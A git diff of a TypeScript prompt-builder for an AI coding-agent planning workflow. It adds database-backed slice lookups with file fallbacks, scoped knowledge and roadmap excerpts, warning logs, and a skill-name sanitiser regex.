         // Use compact format for non-full levels to save ~40% tokens
         const formatted = inlineLevel !== "full"
@@ -270,8 +323,8 @@ export async function inlineRequirementsFromDb(
         return `### Requirements\nSource: \`.gsd/REQUIREMENTS.md\`\n\n${formatted}`;
       }
     }
-  } catch {
-    // DB not available — fall through to filesystem
+  } catch (err) {
+    logWarning("prompt", `inlineRequirementsFromDb failed: ${err instanceof Error ? err.message : String(err)}`);
   }
   return inlineGsdRootFile(base, "requirements.md", "Requirements");
 }
@@ -292,12 +345,137 @@ export async function inlineProjectFromDb(
         return `### Project\nSource: \`.gsd/PROJECT.md\`\n\n${content}`;
       }
     }
-  } catch {
-    // DB not available — fall through to filesystem
+  } catch (err) {
+    logWarning("prompt", `inlineProjectFromDb failed: ${err instanceof Error ? err.message : String(err)}`);
   }
   return inlineGsdRootFile(base, "project.md", "Project");
 }
 
+// ─── Stopwords for keyword extraction ─────────────────────────────────────
+const STOPWORDS = new Set(['of', 'the', 'and', 'a', 'for', '+', '-', 'to', 'in', 'on', 'with', 'is', 'as', 'by']);
+
+// Generic words that don't provide meaningful scope differentiation
+const GENERIC_WORDS = new Set([
+  'setup', 'integration', 'implementation', 'testing', 'test', 'tests',
+  'config', 'configuration', 'init', 'initial', 'basic', 'core',
+  'main', 'primary', 'final', 'complete', 'finish', 'end',
+  'start', 'begin', 'first', 'last', 'update', 'updates',
+  'fix', 'fixes', 'add', 'adds', 'remove', 'removes',
+  'create', 'creates', 'build', 'builds', 'deploy', 'deployment',
+  'refactor', 'refactoring', 'cleanup', 'polish', 'review',
+  // Process/activity words that describe what you're doing, not what domain
+  'hardening', 'validation', 'verification', 'optimization',
+  'improvement', 'enhancement', 'infrastructure',
+]);
+
+// Pattern to match slice/milestone/task IDs (e.g., S01, M001, T03)
+const UNIT_ID_PATTERN = /^[smt]\d+$/i;
+
+/**
+ * Derive a scope keyword from slice title and optional description.
+ * Returns the most specific noun (first non-generic keyword) for decision scoping.
+ *
+ * Examples:
+ * - "Auth Middleware & Protected Route" → "auth"
+ * - "Database & User Model Setup" → "database"
+ * - "Integration Testing" → undefined (too generic)
+ * - "API Rate Limiting" → "api"
+ *
+ * @param sliceTitle - The slice title
+ * @param sliceDescription - Optional roadmap description (demo text)
+ * @returns A single lowercase keyword or undefined if no meaningful scope
+ */
+export function deriveSliceScope(sliceTitle: string, sliceDescription?: string): string | undefined {
+  // Combine title and description for keyword extraction
+  const combinedText = sliceDescription
+    ? `${sliceTitle} ${sliceDescription}`
+    : sliceTitle;
+
+  // Extract all words, lowercase, remove punctuation
+  const words = combinedText
+    .split(/[\s&+,;:|/\\()-]+/)
+    .map(w => w.toLowerCase().replace(/[^a-z0-9]/g, ''))
+    .filter(w => w.length >= 2);
+
+  // Find the first word that is:
+  // 1. Not a stopword
+  // 2. Not a generic word
+  // 3. Not a unit ID (S01, M001, T03)
+  // 4. At least 3 characters (meaningful scope)
+  for (const word of words) {
+    if (STOPWORDS.has(word)) continue;
+    if (GENERIC_WORDS.has(word)) continue;
+    if (UNIT_ID_PATTERN.test(word)) continue;
+    if (word.length < 3) continue;
+    return word;
+  }
+
+  return undefined;
+}
+/**
+ * Extract keywords from a slice title for scoped knowledge queries.
+ * Splits on whitespace, filters stopwords, lowercases.
+ * Example: 'KNOWLEDGE scoping + roadmap excerpt' → ['knowledge', 'scoping', 'roadmap', 'excerpt']
+ */
+function extractKeywords(title: string): string[] {
+  return title
+    .split(/\s+/)
+    .map(w => w.toLowerCase().replace(/[^a-z0-9]/g, ''))
+    .filter(w => w.length > 0 && !STOPWORDS.has(w));
+}
+
+/**
+ * Inline scoped KNOWLEDGE.md content based on keywords from slice title.
+ * Reads KNOWLEDGE.md, filters to sections matching keywords, formats with header.
+ * Returns null if no KNOWLEDGE.md exists or no sections match.
+ */
+export async function inlineKnowledgeScoped(
+  base: string,
+  keywords: string[],
+): Promise<string | null> {
+  const knowledgePath = resolveGsdRootFile(base, "KNOWLEDGE");
+  if (!existsSync(knowledgePath)) return null;
+
+  const content = await loadFile(knowledgePath);
+  if (!content) return null;
+
+  // Import queryKnowledge from context-store
+  const { queryKnowledge } = await import("./context-store.js");
+  const scoped = await queryKnowledge(content, keywords);
+
+  // Return null if no sections matched (empty string from queryKnowledge)
+  if (!scoped) return null;
+
+  return `### Project Knowledge (scoped)\nSource: \`${relGsdRootFile("KNOWLEDGE")}\`\n\n${scoped.trim()}`;
+}
+
+/**
+ * Inline a roadmap excerpt for a specific slice.
+ * Reads full roadmap, extracts minimal excerpt with header + predecessor + target row.
+ * Returns null if roadmap doesn't exist or slice not found.
+ */
+export async function inlineRoadmapExcerpt(
+  base: string,
+  mid: string,
+  sid: string,
+): Promise<string | null> {
+  const roadmapPath = resolveMilestoneFile(base, mid, "ROADMAP");
+  if (!roadmapPath || !existsSync(roadmapPath)) return null;
+
+  const roadmapRel = relMilestoneFile(base, mid, "ROADMAP");
+  const content = await loadFile(roadmapPath);
+  if (!content) return null;
+
+  // Import formatRoadmapExcerpt from context-store
+  const { formatRoadmapExcerpt } = await import("./context-store.js");
+  const excerpt = formatRoadmapExcerpt(content, sid, roadmapRel);
+
+  // Return null if slice not found in roadmap
+  if (!excerpt) return null;
+
+  return `### Milestone Roadmap (excerpt)\nSource: \`${roadmapRel}\`\n\n${excerpt}`;
+}
+
 // ─── Skill Activation & Discovery ─────────────────────────────────────────
 
 function normalizeSkillReference(ref: string): string {
@@ -394,9 +572,17 @@ function resolvePreferredSkillNames(
     .map(skill => normalizeSkillReference(skill.name));
 }
 
+/** Skill names must be lowercase alphanumeric with hyphens — reject anything else
+ *  to prevent prompt injection via crafted directory names. */
+const SAFE_SKILL_NAME = /^[a-z0-9][a-z0-9-]*$/;
+
 function formatSkillActivationBlock(skillNames: string[]): string {
-  if (skillNames.length === 0) return "";
-  const calls = skillNames.map(name => `Call Skill('${name}')`).join('. ');
+  const safe = skillNames.filter(name => SAFE_SKILL_NAME.test(name));
+  if (safe.length === 0) return "";
+  // Use explicit parameter syntax so LLMs pass { skill: "..." } instead of { name: "..." }.
+  // The function-call-like syntax `Skill('name')` led LLMs to infer a positional
+  // parameter name, causing tool validation failures — see #2224.
+  const calls = safe.map(name => `Call Skill({ skill: '${name}' })`).join('. ');
   return `<skill_activation>${calls}.</skill_activation>`;
 }
 
@@ -420,8 +606,6 @@ export function buildSkillActivationBlock(params: {
     params.sliceTitle,
     params.taskId,
     params.taskTitle,
-    ...(params.extraContext ?? []),
-    params.taskPlanContent ?? undefined,
   );
 
   const visibleSkills = (typeof getLoadedSkills === 'function' ? getLoadedSkills() : []).filter(skill => !skill.disableModelInvocation);
@@ -447,14 +631,8 @@ export function buildSkillActivationBlock(params: {
       for (const skillName of taskPlan.frontmatter.skills_used) {
         matched.add(normalizeSkillReference(skillName));
       }
-    } catch {
-      // Non-fatal — malformed task plan should not break prompt construction
-    }
-  }
-
-  for (const skill of visibleSkills) {
-    if (skillMatchesContext(skill, contextTokens)) {
-      matched.add(normalizeSkillReference(skill.name));
+    } catch (err) {
+      logWarning("prompt", `parseTaskPlanFile failed: ${err instanceof Error ? err.message : String(err)}`);
     }
   }
 
@@ -684,31 +862,46 @@ export async function getDependencyTaskSummaryPaths(
 export async function checkNeedsReassessment(
   base: string, mid: string, state: GSDState,
 ): Promise<{ sliceId: string } | null> {
-  const roadmapFile = resolveMilestoneFile(base, mid, "ROADMAP");
-  const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null;
+  // DB primary path — fall through to file-based when DB has no data for this milestone
+  try {
+    const { isDbAvailable, getMilestoneSlices } = await import("./gsd-db.js");
+    if (isDbAvailable()) {
+      const slices = getMilestoneSlices(mid);
+      if (slices.length > 0) {
+        const completedSliceIds = slices.filter(s => s.status === "complete").map(s => s.id);
+        const hasIncomplete = slices.some(s => s.status !== "complete");
+        if (completedSliceIds.length === 0 || !hasIncomplete) return null;
+        const lastCompleted = completedSliceIds[completedSliceIds.length - 1];
+        const assessmentFile = resolveSliceFile(base, mid, lastCompleted, "ASSESSMENT");
+        const hasAssessment = !!(assessmentFile && await loadFile(assessmentFile));
+        if (hasAssessment) return null;
+        const summaryFile = resolveSliceFile(base, mid, lastCompleted, "SUMMARY");
+        const hasSummary = !!(summaryFile && await loadFile(summaryFile));
+        if (!hasSummary) return null;
+        return { sliceId: lastCompleted };
+      }
+    }
+  } catch (err) {
+    logWarning("prompt", `checkNeedsReassessment DB lookup failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
+
+  // File-based fallback using roadmap checkboxes
+  const roadmapPath = resolveMilestoneFile(base, mid, "ROADMAP");
+  if (!roadmapPath) return null;
+  const roadmapContent = await loadFile(roadmapPath);
   if (!roadmapContent) return null;
-
-  const roadmap = parseRoadmap(roadmapContent);
-  const completedSlices = roadmap.slices.filter(s => s.done);
-  const incompleteSlices = roadmap.slices.filter(s => !s.done);
-
-  // No completed slices or all slices done — skip
-  if (completedSlices.length === 0 || incompleteSlices.length === 0) return null;
-
-  // Check the last completed slice
-  const lastCompleted = completedSlices[completedSlices.length - 1];
-  const assessmentFile = resolveSliceFile(base, mid, lastCompleted.id, "ASSESSMENT");
-  const hasAssessment = !!(assessmentFile && await loadFile(assessmentFile));
-
-  if (hasAssessment) return null;
-
-  // Also need a summary to reassess against
-  const summaryFile = resolveSliceFile(base, mid, lastCompleted.id, "SUMMARY");
-  const hasSummary = !!(summaryFile && await loadFile(summaryFile));
-
-  if (!hasSummary) return null;
-
-  return { sliceId: lastCompleted.id };
+  const parsed = parseRoadmap(roadmapContent);
+  const fileCompletedIds = parsed.slices.filter(s => s.done).map(s => s.id);
+  const fileHasIncomplete = parsed.slices.some(s => !s.done);
+  if (fileCompletedIds.length === 0 || !fileHasIncomplete) return null;
+  const lastDone = fileCompletedIds[fileCompletedIds.length - 1];
+  const assessFile = resolveSliceFile(base, mid, lastDone, "ASSESSMENT");
+  const hasAssess = !!(assessFile && await loadFile(assessFile));
+  if (hasAssess) return null;
+  const summFile = resolveSliceFile(base, mid, lastDone, "SUMMARY");
+  const hasSumm = !!(summFile && await loadFile(summFile));
+  if (!hasSumm) return null;
+  return { sliceId: lastDone };
 }
 
 /**
@@ -725,44 +918,68 @@ export async function checkNeedsReassessment(
 export async function checkNeedsRunUat(
   base: string, mid: string, state: GSDState, prefs: GSDPreferences | undefined,
 ): Promise<{ sliceId: string; uatType: UatType } | null> {
-  const roadmapFile = resolveMilestoneFile(base, mid, "ROADMAP");
-  const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null;
-  if (!roadmapContent) return null;
-
-  const roadmap = parseRoadmap(roadmapContent);
-  const completedSlices = roadmap.slices.filter(s => s.done);
-  const incompleteSlices = roadmap.slices.filter(s => !s.done);
-
-  // No completed slices — nothing to UAT yet
-  if (completedSlices.length === 0) return null;
-
-  // All slices done — milestone complete path, skip (reassessment handles)
-  if (incompleteSlices.length === 0) return null;
-
-  // uat_dispatch must be opted in
-  if (!prefs?.uat_dispatch) return null;
-
-  // Take the last completed slice
-  const lastCompleted = completedSlices[completedSlices.length - 1];
-  const sid = lastCompleted.id;
-
-  // UAT file must exist
-  const uatFile = resolveSliceFile(base, mid, sid, "UAT");
-  if (!uatFile) return null;
-  const uatContent = await loadFile(uatFile);
-  if (!uatContent) return null;
-
-  // If UAT result already exists, skip (idempotent)
-  const uatResultFile = resolveSliceFile(base, mid, sid, "UAT-RESULT");
-  if (uatResultFile) {
-    const hasResult = !!(await loadFile(uatResultFile));
-    if (hasResult) return null;
+  // DB primary path — fall through to file-based when DB has no data for this milestone
+  try {
+    const { isDbAvailable, getMilestoneSlices } = await import("./gsd-db.js");
+    if (isDbAvailable()) {
+      const slices = getMilestoneSlices(mid);
+      if (slices.length > 0) {
+        const completedSlices = slices.filter(s => s.status === "complete");
+        const incompleteSlices = slices.filter(s => s.status !== "complete");
+        if (completedSlices.length === 0) return null;
+        if (incompleteSlices.length === 0) return null;
+        if (!prefs?.uat_dispatch) return null;
+        const lastCompleted = completedSlices[completedSlices.length - 1];
+        const sid = lastCompleted.id;
+        const uatFile = resolveSliceFile(base, mid, sid, "UAT");
+        if (!uatFile) return null;
+        const uatContent = await loadFile(uatFile);
+        if (!uatContent) return null;
+        // If the UAT file already contains a verdict, UAT has been run — skip
+        if (hasVerdict(uatContent)) return null;
+        // Also check the ASSESSMENT file — the run-uat prompt writes the verdict
+        // there (via gsd_summary_save artifact_type:"ASSESSMENT"), not into the
+        // UAT spec file. Without this check the unit re-dispatches indefinitely.
+        const assessmentFile = resolveSliceFile(base, mid, sid, "ASSESSMENT");
+        if (assessmentFile) {
+          const assessmentContent = await loadFile(assessmentFile);
+          if (assessmentContent && hasVerdict(assessmentContent)) return null;
+        }
+        const uatType = getUatType(uatContent);
+        return { sliceId: sid, uatType };
+      }
+    }
+  } catch (err) {
+    logWarning("prompt", `checkNeedsRunUat DB lookup failed: ${err instanceof Error ? err.message : String(err)}`);
   }
 
-  // Classify UAT type; default to artifact-driven (LLM-executed UATs are always artifact-driven)
-  const uatType = extractUatType(uatContent) ?? "artifact-driven";
-
-  return { sliceId: sid, uatType };
+  // File-based fallback using roadmap checkboxes
+  if (!prefs?.uat_dispatch) return null;
+  const roadmapPath = resolveMilestoneFile(base, mid, "ROADMAP");
+  if (!roadmapPath) return null;
+  const roadmapContent = await loadFile(roadmapPath);
+  if (!roadmapContent) return null;
+  const parsed = parseRoadmap(roadmapContent);
+  const completedFileSlices = parsed.slices.filter(s => s.done);
+  const incompleteFileSlices = parsed.slices.filter(s => !s.done);
+  if (completedFileSlices.length === 0 || incompleteFileSlices.length === 0) return null;
+  const lastCompletedFile = completedFileSlices[completedFileSlices.length - 1];
+  const uatSid = lastCompletedFile.id;
+  const uatFileFb = resolveSliceFile(base, mid, uatSid, "UAT");
+  if (!uatFileFb) return null;
+  const uatContentFb = await loadFile(uatFileFb);
+  if (!uatContentFb) return null;
+  // If the UAT file already contains a verdict, UAT has been run — skip
+  if (hasVerdict(uatContentFb)) return null;
+  // Also check the ASSESSMENT file for the file-based fallback path (same
+  // reason as the DB path above — verdict lives in ASSESSMENT, not UAT).
+  const assessmentFileFb = resolveSliceFile(base, mid, uatSid, "ASSESSMENT");
+  if (assessmentFileFb) {
+    const assessmentContentFb = await loadFile(assessmentFileFb);
+    if (assessmentContentFb && hasVerdict(assessmentContentFb)) return null;
+  }
+  const uatTypeFb = getUatType(uatContentFb);
+  return { sliceId: uatSid, uatType: uatTypeFb };
 }
 
 // ─── Prompt Builders ──────────────────────────────────────────────────────
@@ -782,6 +999,7 @@ export async function buildDiscussMilestonePrompt(mid: string, midTitle: string,
     inlinedTemplates: discussTemplates,
     structuredQuestionsAvailable: "true",
     commitInstruction: "Do not commit planning artifacts — .gsd/ is managed externally.",
+    fastPathInstruction: "",
   });
 
   // If a CONTEXT-DRAFT.md exists, append it as seed material
@@ -803,7 +1021,7 @@ export async function buildResearchMilestonePrompt(mid: string, midTitle: string
   inlined.push(await inlineFile(contextPath, contextRel, "Milestone Context"));
   const projectInline = await inlineProjectFromDb(base);
   if (projectInline) inlined.push(projectInline);
-  const requirementsInline = await inlineRequirementsFromDb(base);
+  const requirementsInline = await inlineRequirementsFromDb(base, mid);
   if (requirementsInline) inlined.push(requirementsInline);
   const decisionsInline = await inlineDecisionsFromDb(base, mid);
   if (decisionsInline) inlined.push(decisionsInline);
@@ -839,6 +1057,11 @@ export async function buildPlanMilestonePrompt(mid: string, midTitle: string, ba
   const researchRel = relMilestoneFile(base, mid, "RESEARCH");
 
   const inlined: string[] = [];
+
+  // Inject phase handoff anchor from research phase (if available)
+  const researchAnchor = readPhaseAnchor(base, mid, "research-milestone");
+  if (researchAnchor) inlined.push(formatAnchorForPrompt(researchAnchor));
+
   inlined.push(await inlineFile(contextPath, contextRel, "Milestone Context"));
   const researchInline = await inlineFileOptional(researchPath, researchRel, "Milestone Research");
   if (researchInline) inlined.push(researchInline);
@@ -848,11 +1071,21 @@ export async function buildPlanMilestonePrompt(mid: string, midTitle: string, ba
   if (inlineLevel !== "minimal") {
     const projectInline = await inlineProjectFromDb(base);
     if (projectInline) inlined.push(projectInline);
-    const requirementsInline = await inlineRequirementsFromDb(base, undefined, inlineLevel);
+    const requirementsInline = await inlineRequirementsFromDb(base, mid, undefined, inlineLevel);
     if (requirementsInline) inlined.push(requirementsInline);
     const decisionsInline = await inlineDecisionsFromDb(base, mid, undefined, inlineLevel);
     if (decisionsInline) inlined.push(decisionsInline);
   }
+  const queuePath = resolveGsdRootFile(base, "QUEUE");
+  if (existsSync(queuePath)) {
+    const queueInline = await inlineFileSmart(
+      queuePath,
+      relGsdRootFile("QUEUE"),
+      "Project Queue",
+      `${mid} ${midTitle}`,
+    );
+    inlined.push(queueInline);
+  }
   const knowledgeInlinePM = await inlineGsdRootFile(base, "knowledge.md", "Project Knowledge");
   if (knowledgeInlinePM) inlined.push(knowledgeInlinePM);
   inlined.push(inlineTemplate("roadmap", "Roadmap"));
@@ -903,18 +1136,39 @@ export async function buildResearchSlicePrompt(
   const milestoneResearchPath = resolveMilestoneFile(base, mid, "RESEARCH");
   const milestoneResearchRel = relMilestoneFile(base, mid, "RESEARCH");
 
+  const sliceContextPath = resolveSliceFile(base, mid, sid, "CONTEXT");
+  const sliceContextRel = relSliceFile(base, mid, sid, "CONTEXT");
+
   const inlined: string[] = [];
-  inlined.push(await inlineFile(roadmapPath, roadmapRel, "Milestone Roadmap"));
+
+  // Use roadmap excerpt instead of full roadmap for context reduction
+  const roadmapExcerptRS = await inlineRoadmapExcerpt(base, mid, sid);
+  if (roadmapExcerptRS) {
+    inlined.push(roadmapExcerptRS);
+  } else {
+    // Fall back to full roadmap if excerpt fails
+    inlined.push(await inlineFile(roadmapPath, roadmapRel, "Milestone Roadmap"));
+  }
+
   const contextInline = await inlineFileOptional(contextPath, contextRel, "Milestone Context");
   if (contextInline) inlined.push(contextInline);
+  const sliceCtxInline = await inlineFileOptional(sliceContextPath, sliceContextRel, "Slice Context (from discussion)");
+  if (sliceCtxInline) inlined.push(sliceCtxInline);
   const researchInline = await inlineFileOptional(milestoneResearchPath, milestoneResearchRel, "Milestone Research");
   if (researchInline) inlined.push(researchInline);
-  const decisionsInline = await inlineDecisionsFromDb(base, mid);
+
+  // Derive scope from slice title for decision filtering (R005)
+  const derivedScope = deriveSliceScope(sTitle);
+  const decisionsInline = await inlineDecisionsFromDb(base, mid, derivedScope);
   if (decisionsInline) inlined.push(decisionsInline);
-  const requirementsInline = await inlineRequirementsFromDb(base, sid);
+  const requirementsInline = await inlineRequirementsFromDb(base, mid, sid);
   if (requirementsInline) inlined.push(requirementsInline);
-  const knowledgeInlineRS = await inlineGsdRootFile(base, "knowledge.md", "Project Knowledge");
+
+  // Use scoped knowledge based on slice title keywords
+  const keywords = extractKeywords(sTitle);
+  const knowledgeInlineRS = await inlineKnowledgeScoped(base, keywords);
   if (knowledgeInlineRS) inlined.push(knowledgeInlineRS);
+
   inlined.push(inlineTemplate("research", "Research"));
 
   const depContent = await inlineDependencySummaries(mid, sid, base);
@@ -954,19 +1208,42 @@ export async function buildPlanSlicePrompt(
   const roadmapRel = relMilestoneFile(base, mid, "ROADMAP");
   const researchPath = resolveSliceFile(base, mid, sid, "RESEARCH");
   const researchRel = relSliceFile(base, mid, sid, "RESEARCH");
+  const sliceContextPath = resolveSliceFile(base, mid, sid, "CONTEXT");
+  const sliceContextRel = relSliceFile(base, mid, sid, "CONTEXT");
 
   const inlined: string[] = [];
-  inlined.push(await inlineFile(roadmapPath, roadmapRel, "Milestone Roadmap"));
+
+  // Inject phase handoff anchor from research phase (if available)
+  const researchSliceAnchor = readPhaseAnchor(base, mid, "research-slice");
+  if (researchSliceAnchor) inlined.push(formatAnchorForPrompt(researchSliceAnchor));
+
+  // Use roadmap excerpt instead of full roadmap for context reduction
+  const roadmapExcerptPS = await inlineRoadmapExcerpt(base, mid, sid);
+  if (roadmapExcerptPS) {
+    inlined.push(roadmapExcerptPS);
+  } else {
+    // Fall back to full roadmap if excerpt fails
+    inlined.push(await inlineFile(roadmapPath, roadmapRel, "Milestone Roadmap"));
+  }
+
+  const sliceCtxInline = await inlineFileOptional(sliceContextPath, sliceContextRel, "Slice Context (from discussion)");
+  if (sliceCtxInline) inlined.push(sliceCtxInline);
   const researchInline = await inlineFileOptional(researchPath, researchRel, "Slice Research");
   if (researchInline) inlined.push(researchInline);
   if (inlineLevel !== "minimal") {
-    const decisionsInline = await inlineDecisionsFromDb(base, mid, undefined, inlineLevel);
+    // Derive scope from slice title for decision filtering (R005)
+    const derivedScopePS = deriveSliceScope(sTitle);
+    const decisionsInline = await inlineDecisionsFromDb(base, mid, derivedScopePS, inlineLevel);
     if (decisionsInline) inlined.push(decisionsInline);
-    const requirementsInline = await inlineRequirementsFromDb(base, sid, inlineLevel);
+    const requirementsInline = await inlineRequirementsFromDb(base, mid, sid, inlineLevel);
     if (requirementsInline) inlined.push(requirementsInline);
   }
-  const knowledgeInlinePS = await inlineGsdRootFile(base, "knowledge.md", "Project Knowledge");
+
+  // Use scoped knowledge based on slice title keywords
+  const keywordsPS = extractKeywords(sTitle);
+  const knowledgeInlinePS = await inlineKnowledgeScoped(base, keywordsPS);
   if (knowledgeInlinePS) inlined.push(knowledgeInlinePS);
+
   inlined.push(inlineTemplate("plan", "Slice Plan"));
   if (inlineLevel === "full") {
     inlined.push(inlineTemplate("task-plan", "Task Plan"));
@@ -983,11 +1260,7 @@ export async function buildPlanSlicePrompt(
   const executorContextConstraints = formatExecutorConstraints();
 
   const outputRelPath = relSliceFile(base, mid, sid, "PLAN");
-  const prefs = loadEffectiveGSDPreferences();
-  const commitDocsEnabled = prefs?.preferences?.git?.commit_docs !== false;
-  const commitInstruction = commitDocsEnabled
-    ? `Commit the plan files only: \`git add ${relSlicePath(base, mid, sid)}/ .gsd/DECISIONS.md .gitignore && git commit -m "docs(${sid}): add slice plan"\`. Do not stage .gsd/STATE.md or other runtime files — the system manages those.`
-    : "Do not commit — planning docs are not tracked in git for this project.";
+  const commitInstruction = "Do not commit — .gsd/ planning docs are managed externally and not tracked in git.";
   return loadPrompt("plan-slice", {
     workingDirectory: base,
     milestoneId: mid, sliceId: sid, sliceTitle: sTitle,
@@ -1027,6 +1300,9 @@ export async function buildExecuteTaskPrompt(
     : { level: level as InlineLevel | undefined };
   const inlineLevel = opts.level ?? resolveInlineLevel();
 
+  // Inject phase handoff anchor from planning phase (if available)
+  const planAnchor = readPhaseAnchor(base, mid, "plan-slice");
+
   const priorSummaries = opts.carryForwardPaths ?? await getPriorTaskSummaryPaths(mid, sid, tid, base);
   const priorLines = priorSummaries.length > 0
     ? priorSummaries.map(p => `- \`${p}\``).join("\n")
@@ -1117,9 +1393,12 @@ export async function buildExecuteTaskPrompt(
     ? `### Runtime Context\nSource: \`.gsd/RUNTIME.md\`\n\n${runtimeContent.trim()}`
     : "";
 
+  const phaseAnchorSection = planAnchor ? formatAnchorForPrompt(planAnchor) : "";
+
   return loadPrompt("execute-task", {
     overridesSection,
     runtimeContext,
+    phaseAnchorSection,
     workingDirectory: base,
     milestoneId: mid, sliceId: sid, sliceTitle: sTitle, taskId: tid, taskTitle: tTitle,
     planPath: join(base, relSliceFile(base, mid, sid, "PLAN")),
@@ -1155,12 +1434,16 @@ export async function buildCompleteSlicePrompt(
   const roadmapRel = relMilestoneFile(base, mid, "ROADMAP");
   const slicePlanPath = resolveSliceFile(base, mid, sid, "PLAN");
   const slicePlanRel = relSliceFile(base, mid, sid, "PLAN");
+  const sliceContextPath = resolveSliceFile(base, mid, sid, "CONTEXT");
+  const sliceContextRel = relSliceFile(base, mid, sid, "CONTEXT");
 
   const inlined: string[] = [];
   inlined.push(await inlineFile(roadmapPath, roadmapRel, "Milestone Roadmap"));
+  const sliceCtxInline = await inlineFileOptional(sliceContextPath, sliceContextRel, "Slice Context (from discussion)");
+  if (sliceCtxInline) inlined.push(sliceCtxInline);
   inlined.push(await inlineFile(slicePlanPath, slicePlanRel, "Slice Plan"));
   if (inlineLevel !== "minimal") {
-    const requirementsInline = await inlineRequirementsFromDb(base, sid, inlineLevel);
+    const requirementsInline = await inlineRequirementsFromDb(base, mid, sid, inlineLevel);
     if (requirementsInline) inlined.push(requirementsInline);
   }
   const knowledgeInlineCS = await inlineGsdRootFile(base, "knowledge.md", "Project Knowledge");
@@ -1216,22 +1499,34 @@ export async function buildCompleteMilestonePrompt(
   inlined.push(await inlineFile(roadmapPath, roadmapRel, "Milestone Roadmap"));
 
   // Inline all slice summaries (deduplicated by slice ID)
-  const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null;
-  if (roadmapContent) {
-    const roadmap = parseRoadmap(roadmapContent);
-    const seenSlices = new Set<string>();
-    for (const slice of roadmap.slices) {
-      if (seenSlices.has(slice.id)) continue;
-      seenSlices.add(slice.id);
-      const summaryPath = resolveSliceFile(base, mid, slice.id, "SUMMARY");
-      const summaryRel = relSliceFile(base, mid, slice.id, "SUMMARY");
-      inlined.push(await inlineFile(summaryPath, summaryRel, `${slice.id} Summary`));
+  let sliceIds: string[] = [];
+  try {
+    const { isDbAvailable, getMilestoneSlices } = await import("./gsd-db.js");
+    if (isDbAvailable()) {
+      sliceIds = getMilestoneSlices(mid).map(s => s.id);
     }
+  } catch (err) {
+    logWarning("prompt", `buildCompleteMilestonePrompt DB lookup failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
+  // File-based fallback: parse roadmap for slice IDs when DB has no data
+  if (sliceIds.length === 0 && roadmapPath) {
+    const roadmapContent = await loadFile(roadmapPath);
+    if (roadmapContent) {
+      sliceIds = parseRoadmap(roadmapContent).slices.map(s => s.id);
+    }
+  }
+  const seenSlices = new Set<string>();
+  for (const sid of sliceIds) {
+    if (seenSlices.has(sid)) continue;
+    seenSlices.add(sid);
+    const summaryPath = resolveSliceFile(base, mid, sid, "SUMMARY");
+    const summaryRel = relSliceFile(base, mid, sid, "SUMMARY");
+    inlined.push(await inlineFile(summaryPath, summaryRel, `${sid} Summary`));
   }
 
   // Inline root GSD files (skip for minimal — completion can read these if needed)
   if (inlineLevel !== "minimal") {
-    const requirementsInline = await inlineRequirementsFromDb(base, undefined, inlineLevel);
+    const requirementsInline = await inlineRequirementsFromDb(base, mid, undefined, inlineLevel);
     if (requirementsInline) inlined.push(requirementsInline);
     const decisionsInline = await inlineDecisionsFromDb(base, mid, undefined, inlineLevel);
     if (decisionsInline) inlined.push(decisionsInline);
@@ -1258,6 +1553,12 @@ export async function buildCompleteMilestonePrompt(
     roadmapPath: roadmapRel,
     inlinedContext,
     milestoneSummaryPath,
+    skillActivation: buildSkillActivationBlock({
+      base,
+      milestoneId: mid,
+      milestoneTitle: midTitle,
+      extraContext: [inlinedContext],
+    }),
   });
 }
 
@@ -1271,23 +1572,70 @@ export async function buildValidateMilestonePrompt(
   const inlined: string[] = [];
   inlined.push(await inlineFile(roadmapPath, roadmapRel, "Milestone Roadmap"));
 
-  // Inline all slice summaries and UAT results
-  const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null;
-  if (roadmapContent) {
-    const roadmap = parseRoadmap(roadmapContent);
-    const seenSlices = new Set<string>();
-    for (const slice of roadmap.slices) {
-      if (seenSlices.has(slice.id)) continue;
-      seenSlices.add(slice.id);
-      const summaryPath = resolveSliceFile(base, mid, slice.id, "SUMMARY");
-      const summaryRel = relSliceFile(base, mid, slice.id, "SUMMARY");
-      inlined.push(await inlineFile(summaryPath, summaryRel, `${slice.id} Summary`));
-
-      const uatPath = resolveSliceFile(base, mid, slice.id, "UAT-RESULT");
-      const uatRel = relSliceFile(base, mid, slice.id, "UAT-RESULT");
-      const uatInline = await inlineFileOptional(uatPath, uatRel, `${slice.id} UAT Result`);
-      if (uatInline) inlined.push(uatInline);
+  // Inline verification classes from planning (if available in DB)
+  try {
+    const { isDbAvailable, getMilestone } = await import("./gsd-db.js");
+    if (isDbAvailable()) {
+      const milestone = getMilestone(mid);
+      if (milestone) {
+        const classes: string[] = [];
+        if (milestone.verification_contract) classes.push(`- **Contract:** ${milestone.verification_contract}`);
+        if (milestone.verification_integration) classes.push(`- **Integration:** ${milestone.verification_integration}`);
+        if (milestone.verification_operational) classes.push(`- **Operational:** ${milestone.verification_operational}`);
+        if (milestone.verification_uat) classes.push(`- **UAT:** ${milestone.verification_uat}`);
+        if (classes.length > 0) {
+          inlined.push(`### Verification Classes (from planning)\n\nThese verification tiers were defined during milestone planning. Each non-empty class must be checked for evidence during validation.\n\n${classes.join("\n")}`);
+        }
+      }
     }
+  } catch (err) {
+    logWarning("prompt", `buildValidateMilestonePrompt verification classes lookup failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
+
+  // Inline all slice summaries and assessment results
+  let valSliceIds: string[] = [];
+  try {
+    const { isDbAvailable, getMilestoneSlices } = await import("./gsd-db.js");
+    if (isDbAvailable()) {
+      valSliceIds = getMilestoneSlices(mid).map(s => s.id);
+    }
+  } catch (err) {
+    logWarning("prompt", `buildValidateMilestonePrompt slice IDs lookup failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
+  // File-based fallback: parse roadmap for slice IDs when DB has no data
+  if (valSliceIds.length === 0 && roadmapPath) {
+    const roadmapContent = await loadFile(roadmapPath);
+    if (roadmapContent) {
+      valSliceIds = parseRoadmap(roadmapContent).slices.map(s => s.id);
+    }
+  }
+  const seenValSlices = new Set<string>();
+  for (const sid of valSliceIds) {
+    if (seenValSlices.has(sid)) continue;
+    seenValSlices.add(sid);
+    const summaryPath = resolveSliceFile(base, mid, sid, "SUMMARY");
+    const summaryRel = relSliceFile(base, mid, sid, "SUMMARY");
+    inlined.push(await inlineFile(summaryPath, summaryRel, `${sid} Summary`));
+
